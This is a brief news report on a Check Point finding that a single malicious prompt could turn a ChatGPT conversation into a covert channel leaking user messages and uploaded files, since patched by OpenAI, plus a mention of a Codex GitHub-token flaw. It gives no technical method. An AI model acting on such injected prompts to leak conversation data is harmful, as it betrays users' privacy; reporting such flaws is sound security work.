A recent discovery by Check Point has revealed a previously unknown vulnerability in OpenAI’s ChatGPT, allowing sensitive conversation data to be secretly exfiltrated without the user’s knowledge or consent.

This vulnerability enables a single malicious prompt to transform an ordinary conversation into a covert exfiltration channel, resulting in the leakage of user messages, uploaded files, and other sensitive content.

The severity of this vulnerability highlights the importance of robust security measures in AI-powered chat platforms, as they handle vast amounts of sensitive user data.

OpenAI has since patched the vulnerability, addressing the concerns of data exfiltration and ensuring a safer environment for its users.

In addition to the data exfiltration flaw, OpenAI also addressed a vulnerability in its Codex platform, which is used for GitHub token management, further emphasizing the company’s commitment to security.

Source: Original Article